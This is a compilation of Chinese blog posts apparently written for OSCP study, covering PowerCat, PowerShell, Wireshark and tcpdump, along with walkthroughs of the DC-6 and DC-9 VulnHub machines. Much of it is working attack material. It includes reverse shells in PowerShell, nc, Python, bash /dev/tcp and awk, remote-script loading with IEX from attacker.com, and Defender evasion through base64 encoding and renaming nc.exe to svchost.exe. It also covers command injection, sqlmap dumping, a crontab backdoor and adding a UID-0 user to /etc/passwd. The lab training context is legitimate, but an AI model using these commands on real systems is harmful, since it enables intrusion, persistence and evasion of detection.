这样虽然还是会发广播，但是广播之后我们的会话不会掉了。或者改为反弹shell，我们在kali上监听即可。

我们还可以新建一个全新的账户，拥有root权限，这样这个lmao.py也管不着我们了。但是这个靶机似乎限制了不让新建用户。

我们还可以暴力搜索这两行字是从哪个文件出来的，用时较长。

sudo grep -rnw '/' -e 'somewhere' --exclude-dir={proc,sys,dev,run} 2>/dev/null
sudo grep -rnw '/' -e 'TIMES UP LOL!' --exclude-dir={proc,sys,dev,run} 2>/dev/null

补充知识点：字母混淆

以下是更多通过 字母数字混淆（Leet Speak 或 1337 语）生成的趣味性隐藏词组示例，适用于密码、文件夹名、代码变量等场景：

基础替换规则

字母	常见替换字符
A/a	4, @, ^
B/b	8, 6
E/e	3, €
G/g	6, 9
I/i	1, !,
O/o	0, ()
S/s	5, $
T/t	7, +

示例列表

1. 简单数字替换

“backup folder” → b4ckupf0ld3r
“private data” → pr1v4t3d4t4
“admin tools” → 4dm1nt00l5

2. 符号混合替换

“security logs” → $3cur1tyl0g$
“confidential” → c0nf1d3n7!4l
“hacker zone” → h4ck3rz0n3

3. 复杂混淆（符号+大小写）

“top secret project” → 7()p$3cr37pr0j3c7
“system files” → $y$73mF!l3$
“encryption key” → 3ncrYP710nK3y!

4. 幽默短语

“delete this later” → d3l3737h!zl4t3r
“do not open” → d0N()70p3n!!
“trust no one” → 7ru$7n00n3

5. 网络文化梗

“hello world” → h3ll0w0r1d
“lol no way” → 101n0w4y
“yeet archive” → y3374rch!v3

进阶技巧

随机大小写：

p4SsW0rD（password）
AdM!n_P4n3l（admin panel）

插入冗余字符：

s3cr3t!!1!（结尾的 !!1! 模仿打字错误）
f0ld3r~#（添加无意义符号）

拆分单词：

d4t4_b4s3（database）
l0g_5t0r4g3（log storage）

实际应用场景

隐藏文件夹名

将 secret_docs 改为 $3cr37_d0x

生成强密码

M@st3rK3y!2024（原词：MasterKey）

代码变量名

u53r_1nput（user input）

借助AI能帮我们快速识别类似的英语文化的短语，弥补我们英语的不足。

补充知识点：新建与root相同权限的用户

在 Ubuntu 14 中，若需要新建一个与 root 拥有相同权限的账户，可以通过以下方法实现。（注意：赋予普通用户 root 权限存在安全风险，请谨慎操作！）

方法 1：将用户加入 `sudo` 组（推荐）

这是最安全的做法，用户可以通过 sudo 临时获得 root 权限。

步骤

创建用户：

1sudo adduser newadmin # 交互式创建用户，设置密码等信息

将用户加入 sudo 组：

1sudo usermod -aG sudo newadmin

验证权限：

1su - newadmin # 切换到新用户
2sudo -i # 测试获取 root shell

方法 2：直接赋予用户 `root` 权限（UID=0）

将用户的 UID 改为 0，使其等同于 root 用户。（危险！此操作会绕过权限控制，慎用！）

步骤

创建用户：

1sudo useradd -m -s /bin/bash newroot # 创建用户并生成主目录

修改用户 UID 为 0：

1sudo usermod -u 0 newroot

设置密码：

1sudo passwd newroot # 设置新用户的密码

验证权限：

1su - newroot # 切换到新用户
2whoami # 应显示 "root"

验证用户权限

1# 检查用户组
2groups newadmin
3
4# 检查 sudo 权限
5sudo -lU newadmin
6
7# 检查 UID（若使用方法2）
8id newroot # 应显示 uid=0(root)

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day12 Kali渗透工具Powercat和Wireshark、tcpdump

Thu, 15 May 2025 10:40:48 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

PowerCat

概述

定义：基于 PowerShell 的 Netcat 变种，支持 TCP/UDP 通信、端口转发和反向 Shell。
优势：无需安装，可直接在内存中运行，规避杀毒软件检测（上一章的原版powershell不关WD直接用不了，实际环境中是很鸡肋的）。

渗透测试用途

反向 Shell：绕过防火墙建立远程控制通道。
文件传输：在攻击者和目标间传输数据。
端口扫描：探测开放端口和服务。
代理跳板：通过目标主机访问内网资源。

使用方法

步骤 1：加载 PowerCat

1# kali下载
2sudo apt install powercat
3#安装后文件位于，/usr/share/windows-resources/powercat,需要拷贝到windows中执行
4
5# Windows下载kali的文件
6powershell -c "(new-object System.Net.WebClient).DownloadFile('http://172.168.169.128:8000/powercat.ps1','C:\Users\Administrator\Downloads\powercat.ps1')"
7
8# Windows远程加载（常用）,不加载用不了的
9IEX (New-Object Net.WebClient).DownloadString('http://172.168.169.128:8000/powercat.ps1')

步骤 2：常用操作

1# 监听端口并获取反向 Shell（攻击者端）
2powercat -l -p 4444 -e cmd
3
4# 目标机连接攻击者（反向 Shell）
5powercat -c attacker_ip -p 4444 -e cmd
6
7# 端口转发（将本地 8080 转发到 10.0.0.1:80）
8powercat -l -p 8080 -r tcp:10.0.0.1:80

记得关闭Windows Defender不然执行不成功。

powercat 传输文件

1kali：nc -nvlp 8000 > ahell.txt #接收端
2
3powercat -c 172.168.169.128 -p 8000 -i hello.txt #发送端

-c #客户端

-p #目标端口

-i #要传输的本地文件

反弹shell

1Kali：nc -nvlp 443 #控制端
2
3powercat -c 172.168.169.128 -p 443 -e cmd.exe #被控端

正向shell

1powercat -l -p 4443 -e cmd.exe #被控端
2
3kali： nc 172.168.169.136 4443 #控制端

加密防微软

1powercat -c 172.168.169.128 -p 443 -e cmd.exe -ge > bmshell.ps1
2
3# -ge（base64编码）
4
5# 编码以后就是全是乱码，所以在杀毒软件，或者说防守方看起来就不像是这个恶意的一个脚本文件。
6powershell.exe -E (bmshell.ps1用notepad打开复制编码）
7
8# 执行成功

Wireshark

Wireshark 和 Burp Suite 是两款广泛用于网络分析和安全测试的工具，但它们在功能、使用场景和目标用户上有显著区别。以下是两者的主要区别：

1. 核心功能

Wireshark
网络协议分析工具：主要用于捕获和分析网络流量（所有经过网卡的数据包）。
被动监听：监控网络流量，不能直接修改数据包。
协议解析：支持数千种协议（如 TCP/IP、HTTP、DNS、ARP 等），提供详细的协议层级解析。
用途：网络故障排查、性能分析、协议学习、安全取证（如抓取恶意流量）。
Burp Suite
Web 安全测试工具：专注于 Web 应用程序的渗透测试和漏洞挖掘。
主动拦截与修改：作为代理服务器拦截、修改和重放 HTTP/HTTPS 请求。
模块化功能：包含 Scanner（漏洞扫描）、Intruder（暴力破解）、Repeater（请求重放）、Proxy（流量拦截）等模块。
用途：测试 SQL 注入、XSS、CSRF 等 Web 漏洞，模拟攻击行为。

2. 使用场景

Wireshark
分析网络层（如 TCP 连接问题）或传输层（如丢包、延迟）问题。
监控所有网络流量（包括非 HTTP 协议，如 DNS、ICMP、VoIP）。
解密 SSL/TLS 流量（需配置私钥）。
Burp Suite
测试 Web 应用程序的安全性（如 API、网站前后端）。
修改 HTTP 请求参数（如 Cookie、Header）以验证漏洞。
自动化扫描 Web 应用的常见漏洞（如 OWASP Top 10）。

3. 协议支持

Wireshark
支持几乎所有网络协议（从底层以太网到应用层协议）。
适用于分析非 Web 流量（如 FTP、SSH、SMTP）。
Burp Suite
主要针对 HTTP/HTTPS 协议，部分功能支持 WebSocket。
无法直接分析非 HTTP 流量（如 ICMP、TCP 握手过程）。

4. 操作方式

Wireshark
需要选择网卡或导入抓包文件（.pcap）。
通过过滤器（如 http.request.method == "GET"）筛选流量。
Burp Suite
需要配置浏览器代理（如 127.0.0.1:8080）以拦截流量。
通过模块化工具链（如 Proxy → Repeater → Intruder）进行测试。

5. 用户角色

Wireshark
网络管理员、运维工程师、协议开发人员。
Burp Suite
安全工程师、渗透测试人员、Web 开发人员。

6. 典型应用示例

Wireshark
分析为什么某个设备无法连接到服务器（检查 TCP 三次握手是否完成）。
捕获 DNS 查询失败的根本原因。
Burp Suite
修改登录请求中的密码参数，测试是否存在 SQL 注入漏洞。
使用 Intruder 模块暴力破解弱密码。

总结

对比项	Wireshark	Burp Suite
定位	网络流量分析工具	Web 应用安全测试工具
协议支持	所有网络协议	主要 HTTP/HTTPS
操作方式	被动监听、解析流量	主动拦截、修改和重放请求
核心用户	网络工程师、运维人员	安全工程师、Web 开发者
典型场景	排查网络故障、学习协议	挖掘 Web 漏洞、模拟攻击

协同使用

在实际工作中，两者可以互补：

用 Wireshark 抓取底层网络问题（如 TCP 连接失败）。
用 Burp Suite 深入测试 Web 应用逻辑漏洞（如越权访问）。

实操

使用root账号运行wireshark存在风险

抓包能力通过/usr/bin/dumpcap实现，默认只有root，wireshark组成员抓包

.允许普通用户在所有网卡抓包

1sudo usermod -aG wireshark $USER

指定ip地址，或者直接选择网卡查看实时流量

用筛选器做流量筛选

ip.addr==172.168.169.128

一、Wireshark 图形界面常用过滤语法

在 Wireshark 的过滤栏中，可以通过协议、字段、逻辑运算符等快速筛选数据包。以下是一些常用过滤命令：

1. 基础过滤

按协议过滤：

tcp # 显示所有 TCP 流量
udp # 显示所有 UDP 流量
http # 显示 HTTP 流量
dns # 显示 DNS 查询/响应
icmp # 显示 ICMP 流量（如 ping）
ssl # 显示 SSL/TLS 流量

按 IP 地址过滤：

ip.addr == 192.168.1.100 # 显示与指定 IP 相关的流量（源或目标）
ip.src == 192.168.1.100 # 显示源 IP 为 192.168.1.100 的流量
ip.dst == 10.0.0.1 # 显示目标 IP 为 10.0.0.1 的流量

按端口过滤：

tcp.port == 80 # 显示 TCP 端口为 80 的流量（HTTP）
udp.port == 53 # 显示 UDP 端口为 53 的流量（DNS）
tcp.dstport == 443 # 显示目标 TCP 端口为 443 的流量（HTTPS）

2. 高级过滤

组合逻辑运算符：

http && ip.src == 192.168.1.100 # 显示指定 IP 的 HTTP 流量
tcp.port == 80 || tcp.port == 443 # 显示 HTTP 或 HTTPS 流量
!arp # 排除所有 ARP 流量

按内容过滤：

http.request.uri contains "login" # 显示 URL 包含 "login" 的 HTTP 请求
tcp.payload contains "password" # 显示 TCP 载荷中包含 "password" 的数据包

按协议字段过滤：

http.response.code == 404 # 显示所有 HTTP 404 响应
tcp.flags.syn == 1 # 显示 TCP SYN 标志位为 1 的数据包（握手）
dns.qry.type == A # 显示 DNS A 记录查询

3. 流量分析

统计特定流量：

tcp.analysis.retransmission # 显示 TCP 重传的数据包
tcp.analysis.duplicate_ack # 显示重复确认包
tcp.analysis.zero_window # 显示 TCP 零窗口（流量控制问题）

时间范围过滤：

frame.time >= "2023-10-01 12:00:00" && frame.time <= "2023-10-01 13:00:00"

二、命令行工具 `tshark` 的实用命令

tshark 是 Wireshark 的命令行版本，适用于服务器环境或自动化脚本。

1. 基本捕获

tshark -i eth0 # 捕获 eth0 网卡的流量
tshark -i any # 捕获所有网卡的流量
tshark -w output.pcap # 将捕获的流量保存到文件
tshark -r input.pcap # 读取并分析已有的抓包文件

2. 过滤捕获

tshark -i eth0 -f "tcp port 80" # 捕获 TCP 80 端口的流量（BPF 语法）
tshark -i eth0 -Y "http" # 捕获并实时显示 HTTP 流量（显示过滤）
tshark -r input.pcap -Y "ip.addr==192.168.1.100" # 从文件过滤指定 IP

3. 输出格式

tshark -r input.pcap -T fields -e ip.src -e http.request.uri # 提取指定字段
tshark -r input.pcap -V # 显示详细协议解析
tshark -r input.pcap -qz "io,phs" # 统计流量协议分布

4. 高级功能

提取 HTTP 请求：

tshark -r input.pcap -Y "http.request" -T json > http_requests.json

统计 TCP 会话：

tshark -r input.pcap -qz conv,tcp # 列出所有 TCP 会话（源/目标 IP 和端口）

解密 HTTPS 流量（需私钥）：

tshark -r encrypted.pcap -o "tls.keylog_file:sslkeylog.log" -Y "http"

三、其他实用技巧

保存过滤器：在 Wireshark 中右键点击过滤栏 → “Save Filter” 可保存常用过滤条件。
导出特定数据：

导出 HTTP 文件：File → Export Objects → HTTP。
导出特定数据包：右键数据包 → “Export Packet Bytes”。

着色规则：通过 View → Coloring Rules 自定义颜色标记特定流量（如高亮错误码 500）。

总结

场景	命令/语法示例
抓取 HTTP 流量	`tshark -i eth0 -Y "http"`
分析指定 IP 的 DNS 查询	`dns && ip.src==192.168.1.100`
查找 TCP 重传	`tcp.analysis.retransmission`
提取 URL 中的关键字	`http.request.uri contains "admin"`

通过灵活组合过滤语法和命令行工具，可以快速定位网络问题或分析安全事件。

Tcpdump

Tcpdump 106是基于文本的网络嗅探器，尽管缺少图形界面，但仍具有简化，强大和灵活的特点。它是迄今为止最常用的命令行数据包分析器，可以在大多数Unix和Linux操作系统上找到，但是本地用户权限决定了捕获网络流量的能力。

1# 下载官网练习包
2wget wget https://www.offensive-security.com/pwk-online/password_cracking_filtered.pcap
3
4# 用tcpdump读取流量包
5sudo tcpdump -r password_cracking_filtered.pcap

读取是全部显示的，我们可以用一些脚本来做过滤。

1sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $3}' | sort | uniq -c | head
2sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $5}' | sort | uniq -c | head
3
4sudo tcpdump -n -r password_cracking_filtered.pcap | # 读取抓包文件
5awk -F" " '{print $3}' | # 提取第三列字段
6sort | # 排序
7uniq -c | # 统计唯一值出现次数
8head # 显示前10行结果

也可以用tshark来做这个功能

tshark -r password_cracking_filtered.pcap -T fields -e ip.dst | sort | uniq -c | sort -nr | head

可以发现172.16.40.10这个ip请求量尤其多，推测是有爆破攻击行为。所以进一步排查。

sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n port 81 -r password_cracking_filtered.pcap

1sudo tcpdump -nX -r password_cracking_filtered.pcap

发现有一些和admin字样相关的信息

1sudo tcpdump -A -n 'tcp[13] = 24' -r password_cracking_filtered.pcap

1sudo tcpdump -A -n "tcp[13]=24" -r password_cracking_filtered.pcap | grep ^Authorization | sort -u

1sudo tcpdump -A -n "tcp[13]=24" -r password_cracking_filtered.pcap | grep ^Authorization | sort -u | cut -d " " -f 3 | base64 -d

优化显示输出

1sudo tcpdump -A -n "tcp[13]=24" -r password_cracking_filtered.pcap | 
2grep '^Authorization' | 
3sort -u | 
4cut -d " " -f 3 | 
5while read line; do echo "$line" | base64 -d; echo; done

可以看到这个行为就是在爆破admin用户的密码。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day11 Kali渗透工具Powershell

Wed, 14 May 2025 16:44:55 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

以下内容建议在虚拟机中测试，安装Windows10直接点击注册即可，安装Windows11可以参考如下教程设置后链接。win系统镜像可关注泷羽Sec-静安公众号，后台回复“OSCP配套工具”获取本文的工具，文件夹Day11-12中有。

手把手、超详细：安装Windows11 虚拟机Vmware 16.x Pro教程！

PowerShell

下载地址：https://aka.ms/PSWindows

概述

定义：微软开发的脚本语言和命令行 Shell，集成于 Windows 系统，支持自动化任务和系统管理。
特点：无需额外安装，可直接调用 .NET 框架，功能强大且灵活。

渗透测试用途

信息收集：枚举系统信息、进程、服务等（如 Get-Process）。
权限提升：利用漏洞或配置错误提权（如绕过 UAC）。
横向移动：通过 WMI 或 PSRemoting 控制内网其他主机。
文件传输：下载恶意文件（Invoke-WebRequest 或 IEX）。
持久化：创建计划任务、注册表项等维持访问。

PowerShell ISE和终端cmd不同，PowerShell ISE能执行的命令比终端多，而且ISE的界面类似普通编程IDE界面，上方可以编辑ps1文件，并运行，在下方显示运行结果。右侧显示各种模块的名称，可以直接查找后插入。

常用命令示例

 1# 绕过执行策略执行脚本
 2powershell -ExecutionPolicy Bypass -File script.ps1
 3
 4# 从远程加载并执行脚本（无文件攻击）
 5IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')
 6
 7# 编码命令绕过检测
 8$command = "Get-Process"
 9$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
10$encoded = [Convert]::ToBase64String($bytes)
11powershell -EncodedCommand $encoded

实操练习

1Get-ExecutionPolicy

作用：查看当前 PowerShell 的 脚本执行策略（Execution Policy）。
输出 RemoteSigned：表示当前策略允许运行 本地脚本，但来自互联网的脚本（如通过邮件或下载的脚本）必须经过 数字签名 才能运行。
渗透测试意义：攻击者需确认目标是否允许直接运行脚本，若策略为 Restricted（默认），则需绕过限制（如使用 -ExecutionPolicy Bypass）

1Set-ExecutionPolicy Unrestricted

作用：将执行策略修改为 Unrestricted，允许运行 所有脚本（包括远程未签名脚本），但执行远程脚本时会弹出警告。

渗透测试用途
- 绕过默认安全限制，便于直接运行恶意脚本（如从互联网下载的 .ps1 文件）。
- 通常在提权后使用，为后续攻击铺路。
风险：用户可能因忽略警告而误执行恶意脚本。

Kali 中自带一些用于渗透Windows的工具，存在/usr/share/windows-binaries文件夹下。用命令启动一个简单的服务器，可以访问下载即将要用到的软件。

1python3 -m http.server

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://172.168.169.128:8000/nc.exe','C:\Users\Administrator\Downloads\nc.exe')"

作用：使用 System.Net.WebClient 类从攻击者控制的服务器（192.168.162.128）下载 nc.exe（Netcat 工具），并保存到 C:\nc.exe。

渗透测试用途

下载攻击工具：Netcat 常用于创建反向 Shell、端口扫描或文件传输。
横向移动：将工具上传到目标内网主机，进一步控制其他设备。
持久化：结合计划任务或服务，维持长期访问权限。

如果是在靶机上测试，记得关闭Windows的防病毒功能，因为这个nv文件十分典型，会报病毒。如果是在实战渗透中，要对nc文件做加密以绕过检测。绕过检测技巧

使用加密协议（如 HTTPS）或混淆 URL。
重命名 nc.exe 为合法文件名（如 svchost.exe）。
直接在内存中加载工具（无文件攻击），避免写入磁盘。

反弹windows的shell到kali中

Windows中打开ISE，在编辑框中输入

$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0', 443);
$listener.start();
$client = $listener.AcceptTcpClient();
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535 | % {0};
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
 $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
 $sendback = (iex $data 2>&1 | Out-String);
 $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
 $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
 $stream.Write($sendbyte, 0, $sendbyte.Length);
 $stream.Flush();
 $client.Close();
 $listener.Stop()
}

然后在kali中输入

nc -nv 172.168.169.136 443

但是这样获得的链接不稳定，我们把('0.0.0.0', 443);改为攻击机的地址，就能获得稳定的shell。

$listener = New-Object System.Net.Sockets.TcpListener('172.168.169.128', 8888);
$listener.start();
$client = $listener.AcceptTcpClient();
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535 | % {0};
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
 $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
 $sendback = (iex $data 2>&1 | Out-String);
 $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
 $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
 $stream.Write($sendbyte, 0, $sendbyte.Length);
 $stream.Flush();
 $client.Close();
 $listener.Stop()
}

由于之前我们已经用命令下载了nc.exe，所以我们可以在window上用nc方便快捷的建立一个反弹shell。

1./nc.exe 172.168.169.128 4444 -e cmd.exe

然后在kali上监听4444端口即可。

1 nc -nlvp 4444

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day10 DC-6、DC-9靶场WP

Wed, 07 May 2025 16:14:33 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

DC-6

靶场文件下载地址： https://download.vulnhub.com/dc/DC-6.zip

信息收集

sudo arp-scan -l
nmap -sS -sV -A -T5 -p- 172.168.169.132
dirsearch -u http://wordy/ -i 200

只有22，80端口开放，从80端口的扫描结果看，页面重定向到了Wordy的一个域名（也不是真域名），我们要改一下Host文件才能正常解析。

修改host文件，末尾添加这行才能正常解析。

打开网页是一个典型的WordPress默认界面，这是个博客CMS系统，一般有很多漏洞，而且应该有管理员登录地址，后台应该还存在一个数据库用于储存博客文章。

扫描目录发现admin的地址，在登录页面尝试重置密码失败，提示没有启动邮件服务。

有一个页面泄露了信息。curl一下发现存在目录遍历，用脚本把能下载的数据都拖下来分析一下。

1curl -I http://wordy/wp-includes/
2
3wget --recursive --no-parent --convert-links --random-wait \
4 --limit-rate=100k --user-agent="Mozilla/5.0" \
5 --execute robots=off --no-check-certificate \
6 http://wordy/wp-includes/

但是所有的php文件都是下载失败，下载成功的txt文件没有什么收获。

1curl -s http://wordy/wp-includes/.git/HEAD
2curl -s http://wordy/wp-includes/.svn/entries

尝试寻找git泄露和svn泄露也失败了。

密码爆破

这里根据官网提示，密码在rokyou.txt 文件中，然后用kali自带的专门的针对word press的工具WPscan来爆破密码。

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt # 靶机官网给的提示密码
wpscan --url http://wordy -e u # 扫描可能存在的用户名
wpscan --url http://wordy -U user.txt -P passwords.txt

提示存在上面5个用户名，保存成user.txt然后用密码表爆。

1[SUCCESS] - mark / helpdesk01

看到爆破成功的密码。

WP漏洞

用密码登录

可以看到插件管理页面有个IP tools，可以ping IP，然后执行命令。

Kali本地开启4444监听 nc -lvp 4444。

1127.0.0.1|nc 172.168.169.128 4444 -e /bin/bash

Burp抓包修改字段，反弹Shell。

1python -c "import pty;pty.spawn('/bin/bash')"

获取稳定的交互式shell，查找服务器文件，发现home下有各个账户的文件夹，Jens目录下有个打包整个网站的脚本，这样我们就可以下载整个网页源码用于分析。

而Mark文件夹下有个待办清单，里面提示了新建了一个graham账户，密码是 GSo7isUM1D4 已完成。

成功用密码登录graham的ssh。

1ssh graham@172.168.169.132

提权

find / -perm -u=s -type f 2>/dev/null
sudo -l

查看sudo -l 下的内容，发现有jens用户权限执行的脚本，正是刚才我们刚才看见的shell脚本。还提示了不用密码就可以执行，所以我们把弹shell的脚本写进去，用jens去做sudu，应该能弹回jens权限的shell。

1echo "nc 172.168.169.128 4444 -e /bin/bash" >> backups.sh 
2sudo -u jens /home/jens/backups.sh

限制登录了jens的终端，但是还是没有root。老样子，查看一下sudo -l

用nmap打开一个写了后门的nse文件，应该就能提权。

1echo 'os.execute("/bin/sh")' >getshell.nse
2sudo nmap --script=getshell.nse

其他

用jens扫搞nmap命令，想着一句话进root但是失败了，偶然扫出来有mysql端口，所以说，WordPress是一定有数据库的，一开始没扫出来可能是因为关闭的开放权限。既然，来都来了，顺手搞一下数据库。

1nmap -p3306 -sV --script=mysql-info 127.0.0.1

1 scp -P 22 ./Downloads/KaliLearn/fscan graham@172.168.169.132:/home/graham

用scp命令把fscan工具传上去扫一下，后面听说数据库加密的挺横就放弃了，以后再想办法

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

DC-9

靶场文件下载地址：https://download.vulnhub.com/dc/DC-9.zip

信息收集

扫描发现靶机地址为133

打开浏览器看一眼80端口有没有网页，可以看到有apache

扫一遍端口也只发现有80端口可以利用，22端口开放但是目前是关闭状态。

查看网页发现有如下界面，非常明显的提示，可能存在sql注入。

手动注入万能密码发现存在注入

11' or 1=1#

抓包使用sql注入

sql注入

1sqlmap -u "http://172.168.169.133/results.php" --data "search=1" --dbs
2sqlmap -u "http://172.168.169.133/results.php" --data "search=1" -D users --tables
3sqlmap -u "http://172.168.169.133/results.php" --data "search=1" -D users -T UserDetails --columns
4sqlmap -u "http://172.168.169.133/results.php" --data "search=1" -D users -T UserDetails -C “id,username,password,firstname,lastname,reg_date” --dump

但是这几个密码登陆不了，再看看别的表。

1sqlmap -u "http://172.168.169.133/results.php" --data "search=1" -D Staff -T "StaffDetails,Users" --dump

爆出来一个admin用户名和密码这个加密已经自动解出了是transorbital1

管理员的界面多了一个添加记录的功能，但是我们发现左下角有个文件不存在的提示，说明这个网页是解析了一个什么文件，但是靶机文件不存在。网页应该用了文件包含文件解析之类的功能，先尝试一下文件包含漏洞。

文件包含

1http://172.168.169.133/addrecord.php/?file=../../../../../etc/passwd

然后查询ssh的22端口的开门密码，因为原来的22的关闭状态，虽然有这个服务，但是端口没开。开门密码就是把这个端口给打开的一个作用

1http://172.168.169.133/addrecord.php/?file=../../../../../etc/knockd.conf

敲门打开ssh

1 nc -v -w 1 172.168.169.133 7469
2 nc -v -w 1 172.168.169.133 8475
3 nc -v -w 1 172.168.169.133 9842

敲完门发现ssh打开了。

hydra密码爆破

把之前sqlmap爆出来的表格中用户名和密码单独存为user.txt和passwd.txt。这个表格在/home/kali/.local/share/sqlmap/output/172.168.169.133/dump/users/UserDetails.csv

1hydra -L user.txt -P passwd.txt ssh://172.168.169.133

然后用hydra带上用户名和密码爆破。

1[DATA] attacking ssh://172.168.169.133:22/
2[22][ssh] host: 172.168.169.133 login: chandlerb password: UrAG0D!
3[22][ssh] host: 172.168.169.133 login: joeyt password: Passw0rd
4[22][ssh] host: 172.168.169.133 login: janitor password: Ilovepeepee

进账户搜账户下文件，发现history都被销毁了，只有janitor账户下有新东西。

1janitor@dc-9:~$ cat .secrets-for-putin/passwords-found-on-post-it-notes.txt 
2BamBam01
3Passw0rd
4smellycats
5P0Lic#10-4
6B4-Tru3-001
74uGU5T-NiGHts

再用这些密码继续爆破密码。

1[DATA] attacking ssh://172.168.169.133:22/
2[22][ssh] host: 172.168.169.133 login: fredf password: B4-Tru3-001
3[22][ssh] host: 172.168.169.133 login: joeyt password: Passw0rd

爆破出来新的fredf的账户，joeyt我们已经登陆过了。

fredf账户主页下面还是没有什么有价值的东西，但是fredf的权限组看起来应该是比之前的几个账户高的，之前的几个账户连运行sudo -l的权限都没有，而fredf有权限运行，且发现一个可以利用的脚本test。

/etc/passwd 提权

test在一个dist文件夹下，这个dist是典型的python编译为二进制文件，打包后的目录，所以查看该目录下能发现test的源码。

这个test的作用就是把2文件的内容加到1文件末尾，但是她是sudo权限，也就是说像/etc/passwd这样的文件它也可以加，我们可以加一个新账户，有root权限。注意这里的slat后面的单词：Salt 超过 8 字符导致截断，太长会导致验证时盐值不匹配。

openssl passwd -1 -salt MS02423 MS02423
cd /tmp # 不在tmp目录下echo输出的不对
echo 'MS02423:$1$MS02423$xCJ3D9eufDuODS1PBNjp51:0:0::/root:/bin/bash' > MS02423
sudo /opt/devstuff/dist/test/test MS02423 /etc/passwd

整点花活，都有川建国了不是，再加一个拜振华。

crontab反弹提权

test这个脚本的功能，除了可以写用户名，还可以写crontab，可以用来执行红队的一些高危命令，进而达到提权目的。

1*/5 * * * * /bin/nc 172.168.169.128 4444 -e /bin/sh

一开始想弹nc，但是发现nc命令用不了。但是他有些python的脚本那么python一定可以用。新建一个python脚本py3shell.py，写好攻击方法

 1import socket
 2import subprocess
 3import os
 4
 5# 设置目标主机和端口
 6HOST = '172.168.169.128' # 替换为攻击者的 IP 地址
 7PORT = 8888 # 替换为攻击者监听的端口
 8
 9# 创建 socket 对象并连接到攻击者
10s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
11s.connect((HOST, PORT))
12
13# 重定向标准输入、标准输出和标准错误
14os.dup2(s.fileno(), 0) # stdin
15os.dup2(s.fileno(), 1) # stdout
16os.dup2(s.fileno(), 2) # stderr
17
18# 执行 shell
19subprocess.call(['/bin/sh', '-i'])

再写一个用于test脚本写入crontab执行的文件111.txt，写入如下内容。

1* * * * * root /usr/bin/python3 /tmp/py3shell.py

然后再用test把命令加岛crontab中去。

1sudo /opt/devstuff/dist/test/test 11.txt /etc/crontab

一分钟后成功弹回。

AWK反弹和直接提权（失败）

查找当前账户下可用来反弹shell的命令

ls /bin | grep -E 'bash|sh|nc|netcat|socat|python|perl|php|ruby|telnet|openssl|awk|find'

发现有awk可以用，awk是可以直接提权的，不用写入crontab中。

/bin/awk 'BEGIN {s = "/inet/tcp/0/172.168.169.128/4444"; while(1) { do { printf "> " |& s; s |& getline c; if(c) { while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") } }'

尝试了这些命令都用不了，在root账户情况下，awk可以用，telnet也可以用，但是反弹没有回显

1*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/172.168.169.128/4444 0>&1' 
2 /bin/telnet 172.168.169.128 4444 | /bin/sh | /bin/telnet 172.168.169.128 4444

除了反弹shell，awk还可以直接提权https://gtfobins.github.io/，但是这个靶机用不了

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

补充知识点：Sudo -l 的作用

sudo -l 是 Linux/Unix 系统中用于 查看当前用户的 sudo 权限 的命令，它能显示用户被允许执行的命令列表、目标用户身份（如 root）以及是否需要密码验证。

核心作用

权限审计
检查当前用户可以通过 sudo 执行哪些特权命令，避免权限滥用。
安全测试
渗透测试中快速识别可能的提权路径（如无密码执行危险命令）。

使用场景

系统管理：验证用户权限是否符合最小化原则。
